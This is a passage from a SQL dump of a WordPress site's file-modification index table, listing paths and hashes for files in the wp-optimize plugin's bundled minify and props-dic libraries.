A56E68F7A4BB64FE0942E7C368835AD,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/builder/test.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/builder/test.php',1,0x00000000000000000000000000000000,0x671AAFC3DCD607AE574F1BCF5DD9B465,0x0A1FF64D71782E2ACE615692A330FC7917F07D742F51E438B9178D60FFB70D21,'',0,'?'),(0x25FEBA0C848469C1327AF0EB5BCBA273,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/config-test.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/config-test.php',1,0x00000000000000000000000000000000,0x8D12A156C5F172C602426329D637AF1E,0xC91B68028C1B5D561496E8E0C92B5F4102620296C0468013B0657E0C1B518F48,'',0,'?'),(0x36DF0C36D25C3EA16CDF133EDB0CF384,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/config.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/config.php',1,0x00000000000000000000000000000000,0x9CA53CB29059137677A834811A3E6697,0x4662515F2AFF1595411159118CCBC1D597AEC2D01B295898420AD596DD48CE71,'',0,'?'),(0x4AFE368C18F6DFD895DC1AA3B86F8887,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/example.index.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/example.index.php',1,0x00000000000000000000000000000000,0x52A19FF8C7538F020E55BC9698713BF6,0xCCF9D70F75A816DD9A5822D456E222936218C9649A33976025DBD40E64E98AC6,'',0,'?'),(0x06141780A204B9D037DC2B2B320CE4EA,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/groupsConfig.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/groupsConfig.php',1,0x00000000000000000000000000000000,0x8235B1AB4A8DB21A20FB415E7DD361FC,0x4E02B3960630313276B6F8184D1CB61AEE5A7CDC1E78F7347BFC270DD63E8F9F,'',0,'?'),(0xD0FEA31E9AB77832013A9F821A79F276,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/index.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/index.php',1,0x00000000000000000000000000000000,0xDE7C1EFB1E911730C4A32C6F076CDA96,0x2BC8D2F1300B4935073539B3DB2FEAB74E37247DDC89D153A62DD0F78074E5EC,'',0,'?'),(0x01317592D3F22FC87CCA901C1140BD79,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/HTTP/ConditionalGet.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/HTTP/ConditionalGet.php',1,0x00000000000000000000000000000000,0x6AC5C640A78A743BF2909A26AD611047,0x0C5BFDBE8BF17280A1F7092F2088E5B87645C17AE511DFCD6CE477561CB26E57,'',0,'?'),(0x6836296C91A5CF34877EE17C5857B053,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/HTTP/Encoder.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/HTTP/Encoder.php',1,0x00000000000000000000000000000000,0x88089FAB7FC24AE099B6A1A32CF5BE08,0x2640E2C41393374CE5FB87AF77CDC9C0A4EFD44BD8EE2F5693CBE02231351BFB,'',0,'?'),(0x066F605AFC2E0E33B8536A66AF81FAEB,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/App.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/App.php',1,0x00000000000000000000000000000000,0xFB3C7DF04E6C07E9532E103D4CF00785,0x0D30B1470B0DE2532793D589CDCA7A166376CE71616FA6C5C4E7CD7B93DDE6B4,'',0,'?'),(0xF0F3D923EE80C0E9D55D3DF08E65D690,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Build.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Build.php',1,0x00000000000000000000000000000000,0x8F4C9746FCCB9E1F7CDA7F50133D67F5,0xF99DF941287996FD3B8E24251D8EB2346CFDA4EB0B19DF81BECDE047E436A04E,'',0,'?'),(0x97479838105BB69D0EC0FBC096DA28AF,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS/Compressor.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS/Compressor.php',1,0x00000000000000000000000000000000,0x322A3A3CF7FFC282BDE7BC769177948D,0xAC8BE0344E43D97800C3BCE5D810B02DF38524C72C8C82F7507A101A0FC84900,'',0,'?'),(0xC86266E8D855C73987024146A12F43AE,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS/UriRewriter.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS/UriRewriter.php',1,0x00000000000000000000000000000000,0xA972F711B2EF9B1CF7F835CC2093E10E,0x6FD4369BB21A4F0A0895D9D94A0812F39267FDF6066B5EA495119F9E44947D02,'',0,'?'),(0xB2BB0E4D8AF1DB0016770E9E6CC79A84,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSS.php',1,0x00000000000000000000000000000000,0xC06BFB240FB05BDA6E517C2C896B6952,0x8CCB0FDAD7224861E0D69E2EA11580287D0E28D5C521011B80D6E8E5298E23B8,'',0,'?'),(0x07AD4D9C0A065B259F1D8E7244DE693C,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSSmin.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CSSmin.php',1,0x00000000000000000000000000000000,0x59E9E3406EA2AAFA96A0C994372342FC,0x17146CE35D296B650891EE2CD399BC6BE26C37A9041093AD14D9B40130ABCBB2,'',0,'?'),(0xD7189371E326C98EC2C1D70416ED7051,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/APC.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/APC.php',1,0x00000000000000000000000000000000,0x977DE5E3C4051954846C6B7BCFB7108D,0x7A757690EB56BBE491BA645621182040EFE7E3635D32405B2FFB2687D28BAC64,'',0,'?'),(0xEE0C4300DE27F2DA478C797C104E55A7,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/APCu.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/APCu.php',1,0x00000000000000000000000000000000,0x31A28C4C53D7370EDACB13552F40F51B,0x30120C326FAE8B684DDF661508D93FB3A7943D7DBF8FDA2ED1C04AD0DF401FC8,'',0,'?'),(0xA0FFDDD89713FECCBE0FCF2CF8D802A7,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/File.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/File.php',1,0x00000000000000000000000000000000,0xC91DFF76FBC3842F21664D341CBE740E,0x482960C5EA975E586DF20F8C76E65B4198E40B8B644501EA83D92D81D7A3ABD5,'',0,'?'),(0x23D0BAA77662A099B8E81D61C0CE19BD,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/Memcache.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/Memcache.php',1,0x00000000000000000000000000000000,0x710529501CFC948D09CB5E49F3012C44,0x5D9BB78261088B38AE759091180C3472F269695F46E91643485EFBA4413EE317,'',0,'?'),(0x8048013AC8837B12C9BBD861E0C0CA49,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/Null.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/Null.php',1,0x00000000000000000000000000000000,0x732289EACCCE319BF6DD58B35EABD571,0x798F7B84DD2079883491274BCC27D46EB1C10DC4B844BD8A2C64007D78F3E9F7,'',0,'?'),(0xD7DD5F1EEB780C3C8BDF5416250040D5,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/WinCache.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/WinCache.php',1,0x00000000000000000000000000000000,0xB0C0A29FA647B84A81FEE104945A2A8C,0xDA983D7C5BA230B0DB443EE93F943F3420EE52C78BC443DCB6E11342297BD690,'',0,'?'),(0x8E71E0E197F37B451FAEE10625020C18,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/XCache.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/XCache.php',1,0x00000000000000000000000000000000,0x4D6CF9C91337774B17A9DD6B94FA2EF4,0x6C95203AB1B95CFD5F1924A23732405437B8C8987B18CA71F4C7195D8B923226,'',0,'?'),(0x798DA2917AD2B6C061A39A57368C9E9B,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/ZendPlatform.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Cache/ZendPlatform.php',1,0x00000000000000000000000000000000,0xD42349C536247200DF85061A10D2B784,0x1FC000431D5891D670E4F36CC137E0B554D6DB801621A03A917A43903C8203FC,'',0,'?'),(0x72E14727DFAEF62E43804E5836FAF9CE,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CacheInterface.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CacheInterface.php',1,0x00000000000000000000000000000000,0xCC333564E7983D230A0F083981D6CE19,0x8BC31AF1B845D070F86E1579E9D163484E6C100EB38AE398953561259947F719,'',0,'?'),(0x1A23983DDE5C21C7EAA5FA0053725274,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ClosureCompiler.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ClosureCompiler.php',1,0x00000000000000000000000000000000,0xC0AF676C2852F2105A4E452CA23B4EBE,0xEED0DE0E3C01B2BAB434729FF487FEF4CF06041777C0F94331F7E5C17371FAE3,'',0,'?'),(0xDC2D48931AE199EAF222988F24B8C8EE,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CommentPreserver.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/CommentPreserver.php',1,0x00000000000000000000000000000000,0x4936B37522A5526786E61365D0AAF51E,0x0FA4AAA7DA8E3504A29AF6B038D718FD8690A523EF41FBFB666EEFFD156CE0F5,'',0,'?'),(0x85F49CB32E3B7FCB78BCD125B9AD3ACF,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Config.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Config.php',1,0x00000000000000000000000000000000,0x379059970B2C911B9302877DA61CEEEE,0x4A997A25767A3A4F32EF594614CCE26393413E32837EBDA31EFE04F53575CB89,'',0,'?'),(0x1A108EA9E41CDD66EFDF018C68BAEAE6,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Base.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Base.php',1,0x00000000000000000000000000000000,0x6E39D85CCBB97EA7B6B277FA61783679,0x3D9A731553978EFFAD5D7AAC205CE3B9D27823EF9AF6D3820E63451693C1C9ED,'',0,'?'),(0xCE5C30F9BB360F339E634FD4912DC050,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Files.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Files.php',1,0x00000000000000000000000000000000,0x967D1951EBFBB7417F4E090A68442FB9,0xEC0E743AB2286951C31E46F9F9D32D7F80154E3896E26F1AD0DA6F08AE8B6846,'',0,'?'),(0x07A77B3ABFB8E31084C6B4346DBEE102,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Groups.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Groups.php',1,0x00000000000000000000000000000000,0xF621632FB56ED13DDAB181A8E65652E6,0x0158188DC16ADDB705747C3EE6CD4E2FB238F4FAA3CFCEF36B3535875D0AE4F1,'',0,'?'),(0x7286CAF02BEA2DC95FBF60B22E5FDC18,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/MinApp.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/MinApp.php',1,0x00000000000000000000000000000000,0xEC92093330552EF1FEB074A45DE683C1,0x3BA7FBDE31D93A6C2ACCDD70BEA7FF50436EBE37996F77523ACE0FE99AF76C35,'',0,'?'),(0xDE11CE09404F3D09295CFDD98A7BCAD7,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Page.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Controller/Page.php',1,0x00000000000000000000000000000000,0xD8A3B0B7FE58114136BE979F161C3087,0x2B168E71FD9BC2932958E3C4A16925EF86B612A92991CDDA43BFEA52D5306BC4,'',0,'?');
INSERT INTO `wpcl_wffilemods` VALUES (0x6DB6FAA7E82FDCA18C9C21E5EB7392D2,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ControllerInterface.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ControllerInterface.php',1,0x00000000000000000000000000000000,0x9447B7F8322EE3BBD0183555103F8FBC,0xE4CF2AD2795069A960B10DFA1DB2CDFFE895756AB3F59B86E5A8B37EA7359EEC,'',0,'?'),(0xA79ED617D1B312BE5CD60729E086773B,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/DebugDetector.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/DebugDetector.php',1,0x00000000000000000000000000000000,0x6D5F88C02DD469ACE4EB000BD323D672,0xF51C9BD02574CA561527D5C61918AD503D1A17AA2BB04E42B18E6876E25DA7DC,'',0,'?'),(0xC5FB8573A4BEC35CDCA5299DA2D9B8E2,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Env.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Env.php',1,0x00000000000000000000000000000000,0xA518D1082307031C9E3DBA01EA30569E,0x09D79C50CAC844FBA11C0E0E6E6760FAF3BCC5A0CE51C8F68BAB5F5A90F76B23,'',0,'?'),(0xC1FCA66BD1AE17CB741A5AFDB24E047E,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/HTML/Helper.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/HTML/Helper.php',1,0x00000000000000000000000000000000,0x6B49FC173BF510D39CE1EA6C5C3665AB,0x0EF1066115E806D75A5A69629F4C14F9E657C3681A9BFD0F98FBED4A3CB9646D,'',0,'?'),(0x8526DCE19DC212F9A627EC7B10E8C353,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/HTML.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/HTML.php',1,0x00000000000000000000000000000000,0x4FBAE3160370E7F029C5B0BD1F2DFF4C,0x78FC6A376F3D27AB2949C2344BB83C6CD4087BF2A0EC3C4E1856E6E92CCECB0D,'',0,'?'),(0x78C5D97E148AE922B67BD2BA4DE5D62D,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ImportProcessor.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ImportProcessor.php',1,0x00000000000000000000000000000000,0xB5E800D2127DA2E263A71ECDD60B776F,0x0FE728CEC6846A84C4E6F41AE6D925F4A8B5EE89A415A741E54592C4C5B863A8,'',0,'?'),(0x83A9594FA52C48EC2FAB4C364716429F,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/JS/ClosureCompiler.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/JS/ClosureCompiler.php',1,0x00000000000000000000000000000000,0xCBBDA8E52CEE91DC48F096814AF29443,0xF3CC7E14BE63DC257403E0F82A4FDABEAB2B7D833B220694C5DB97B1A866B55B,'',0,'?'),(0x58CA949BDA315E21DB81A54B2763AEFC,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/JS/JShrink.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/JS/JShrink.php',1,0x00000000000000000000000000000000,0xC9AC911762177C8F29F818AC1E98C3BC,0xAAC36D24F547781A4AD6B8D929F5F58AD66DF2C2B41584CE05FD36BF17B6E282,'',0,'?'),(0xFAA21D61C0FB91992B41272FF324B2C9,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/LessCssSource.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/LessCssSource.php',1,0x00000000000000000000000000000000,0x68E39FF6DD99DE0E5ACFFAD89AA172B9,0x2E0EF760425E173D352ADB47DA71B48CF2F4D94BE60E978E7F518F40DC53ED74,'',0,'?'),(0x2A480630DDB04B62D45671C6F827D95D,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Lines.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Lines.php',1,0x00000000000000000000000000000000,0xDE7B666AA14977F1BFF00C14E8A80346,0xF706EF88E86C65192658345A1A244A73F228E2B6045F599D1C5E2A5C98405D9D,'',0,'?'),(0x4D838A59BE79D7E7C547729BDDD62796,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Logger/LegacyHandler.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Logger/LegacyHandler.php',1,0x00000000000000000000000000000000,0xF7FDFC0E3B7ABCB882867404967967E6,0x9048E65902CA31BE310F7DC01B173E38D35E871D83F94D99A54EDE6757BDE698,'',0,'?'),(0x67B104CA2726710D78767A4B74A558E3,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/NailgunClosureCompiler.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/NailgunClosureCompiler.php',1,0x00000000000000000000000000000000,0x7574E73669E33C31DA168CFA207D2A05,0x3740BB2BC956516C433ED4ECEA070A4352C44C732BACFBE74C35E217191EEF41,'',0,'?'),(0x134BCFC5547A894E680E5B88E633D40A,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Packer.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Packer.php',1,0x00000000000000000000000000000000,0xB1576918E3D92BBAABE57C92DCAD1DBD,0x7930BB6D6BDD883E5A000522A2F808FEA5DEB1D9A66612DC219757F47A69EB35,'',0,'?'),(0x5152E03B0D4123B1412A03A00371C060,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ScssCssSource.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ScssCssSource.php',1,0x00000000000000000000000000000000,0xFCFA2221140CC6D9CD93370E75602B71,0x3E55BD27AB7D73263C3C2ED3B36384B2BB0AB99A1018F76BCAA1E4A51B28292A,'',0,'?'),(0x08DD90E2E7785FD1E53F5191F42BF568,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ServeConfiguration.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/ServeConfiguration.php',1,0x00000000000000000000000000000000,0x07B8D08016CBEBB24F18035787F48964,0x80DF5CC35DCA7E5B285DB91A055892175BE36B5CA7447FBC5C3FA669D0FC4FFD,'',0,'?'),(0x305DF01F0EF361BB04C54A7F7EA835F3,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source/Factory.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source/Factory.php',1,0x00000000000000000000000000000000,0xE0424F0FF861D722DCBE242F7A6F8B6A,0x563B28579E1641C7C4A6F64F47DC5B887EA0BEE6D03CAB5EFAA530798B10588A,'',0,'?'),(0x3DE2929CE9FB5785B1FC7E315F0383F4,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source/FactoryException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source/FactoryException.php',1,0x00000000000000000000000000000000,0x187C029B086DFBA96A355CCB0F903368,0xA986415C13EF2FAB6C085EE303260A54DC8030A6D7DCACBEF71DD3F33427D90D,'',0,'?'),(0x6FDE768BBAB3F82E359EED522E6B3B2B,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/Source.php',1,0x00000000000000000000000000000000,0x8D754EA9C07C832A3B8F6AAB7CA7A3A8,0xC6A3B464DF70E50E9EB7353AEB6C60CF44530591591959C9EB6A6D38F32BF9C5,'',0,'?'),(0x43143468CFF7B6485D3FBA762724BD3A,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/SourceInterface.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/SourceInterface.php',1,0x00000000000000000000000000000000,0x5D526D21D5065F9A2B0A9B590AC21350,0x3E60FBDC838413A823AFAF5D09753712F748E08C568305D33A2770BAA00B368A,'',0,'?'),(0x2C1186DF0BAE45BDBF0E8C6D71429701,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/SourceSet.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/SourceSet.php',1,0x00000000000000000000000000000000,0x434A75B093DA6459B717E6C5C5CA5ADF,0x30307AB9BFDD8945869BA1117C77811021B914B722A94BC881ECCDFAEEC66458,'',0,'?'),(0x5E7D0F223E9BAA0D9207AD46D01D3573,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/YUICompressor.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/YUICompressor.php',1,0x00000000000000000000000000000000,0x03AB03D0D6FAFF1DCC73675B9F1BC63F,0xE8D829DBB5B7820F840DC57B1E06C37DF9362889CBFBDD0184C3CCF3009A59AD,'',0,'?'),(0x9F1837DE5A767C78169AFCC8EF80CB74,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify.php',1,0x00000000000000000000000000000000,0x705E5DCF16AB5B5A4F74A2BE9749CD67,0xF01674373DDC88605FD91DB4309253CADAD1D0EFB06812F956AA0B4A40E10800,'',0,'?'),(0xD88832FA941F73DF238868B988B440F3,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/MrClay/Cli/Arg.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/MrClay/Cli/Arg.php',1,0x00000000000000000000000000000000,0x2474B33F0A988E1725FB9DAD41956E2B,0xDEF12C8F06B0CCA5D858F34D04000D83BB311F2192B02E53B85430F379E8A7E7,'',0,'?'),(0x5C3D8A8B692AF595C9CD25FBAA36983B,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/MrClay/Cli.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/MrClay/Cli.php',1,0x00000000000000000000000000000000,0xAE008982E793F2B60392B136BDE76D34,0x33907955F818461869ED0C76156448C6F1C89B860F028A2C330F015B2AB127FA,'',0,'?'),(0x8C5A1891D2E5E8F552E50403A8A2DAD4,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.css','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.css',1,0x00000000000000000000000000000000,0xE357656DF46EEFE471215A4B2E420245,0x93F6AB5BC56F73FF795447A58C01ECBF49A3410FD8AA227A03A76C20CFAAA083,'',0,'?'),(0xD47108AC45F2534C4FB7BE2C85570106,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.js','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.js',1,0x00000000000000000000000000000000,0x4F94602F2E0DDB519DC10AD4091EBC0E,0x8DB43D3A54E5AA854842D1194ADF2FB050737C0932A51EF1A4D258D97FF110A0,'',0,'?'),(0xEE87FF599D1A9E548D4A68D1D354BCA5,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.less','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-test.less',1,0x00000000000000000000000000000000,0x21CE511D2476C92607673DFA5919799A,0xE0CCA58BB37BB68CB73A5659C83C99B4CB9FC9D8CDB8084172A339C600135161,'',0,'?'),(0xF49DC8622B818F64D5862EE996948EB8,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-testinc.less','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/quick-testinc.less',1,0x00000000000000000000000000000000,0x6B16D11310D768A50B585D4E951255E8,0x4A51E7A3172BB87BB3C554F01D8CC9255D92983A9C074807D2334AF9001DBF9E,'',0,'?'),(0xA7312694135BA543ACE7E49D58D0A50D,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/server-info.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/server-info.php',1,0x00000000000000000000000000000000,0x8D7433439C982899D517785D2691F3BC,0xD427D9D529C06B25EF535BB71FBB08DFB8EF22BFB380A22FABF907E8AE4D6AB7,'',0,'?'),(0xC612E89166CB9F724D426B485FDA1CC3,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/static/gen.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/static/gen.php',1,0x00000000000000000000000000000000,0x35905C2B8E3AC532DCF5E5A37D649AB5,0xF29510C15C9C05834252BB0992BCB3FAF0307735403EE1FE34E3086D82634EE5,'',0,'?'),(0x33089C43F2EFEB3E015E876C3CB5D826,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/static/lib.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/static/lib.php',1,0x00000000000000000000000000000000,0xE3B164F1EAD2739B5D8D763E6B1DF891,0xD8EDD5E8D52D3F2467A02B297153CA5A6367E131A22D04C62A4F185948CC230C,'',0,'?'),(0x5901B699B9F6EB483D20EFAC66D89AF0,'wp-content/plugins/wp-optimize/vendor/mrclay/minify/utils.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/minify/utils.php',1,0x00000000000000000000000000000000,0xAEEA25001CEB825AAD59B10385A49BB5,0xFF5432ADF8BDC7142711A1985B3F053948C9C048A646517126F516C9C13137B4,'',0,'?'),(0xB19F232B79D3FE8BDD4200C241835E5F,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/LICENSE','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/LICENSE',1,0x00000000000000000000000000000000,0xC552B8256998E8FFA54732C9C558A997,0xCC9B0E6D0128E7853891B08C158C31EE96E4789A18F2548AA6571080425CE109,'',0,'?'),(0x037E2CD3252E6B36EEDBEEAFCC6BFE7D,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/BadMethodCallException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/BadMethodCallException.php',1,0x00000000000000000000000000000000,0x0281955C328D41177A78253781031038,0xF7747094449962340612A4105F65D839E4AC4D896E5CF62FE89C6661FC45499A,'',0,'?'),(0x28117C9641FACDC1C5D173181E549FAA,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/Container.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/Container.php',1,0x00000000000000000000000000000000,0x2F1DBF03884A66C064C06AFAF3DE99A8,0x30993E6687BCE70521EE063869773C8EA02835E5A4424C84B3DCC4AFC66D6150,'',0,'?'),(0xCD6B07DBDBC090091D55FB0F3A391AAF,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/FactoryUncallableException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/FactoryUncallableException.php',1,0x00000000000000000000000000000000,0xD3346BB0E5FCD7E9E05CE12E4AF541EF,0x9AD0CB70E82806EA4A7E9AF2DFA8F72088ED0747A3BB9DDF4F58907211BA11D7,'',0,'?'),(0xB04D54A9547535534975AFEA411CA808,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/NotFoundException.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/NotFoundException.php',1,0x00000000000000000000000000000000,0x7F8255067C28D8E5C023B715FFF26C0F,0x5CC735B93356F3592BDE8A2BDEB7EBA443F5CA35493D78FC5B4B848CEF543E80,'',0,'?'),(0xFD4A039FC1F015A867FE6E6995825C60,'wp-content/plugins/wp-optimize/vendor/mrclay/props-dic/src/Props/Pimple.php','/home/eckank5/public_html/wp-content/plugins/wp-optimize/vendor/mr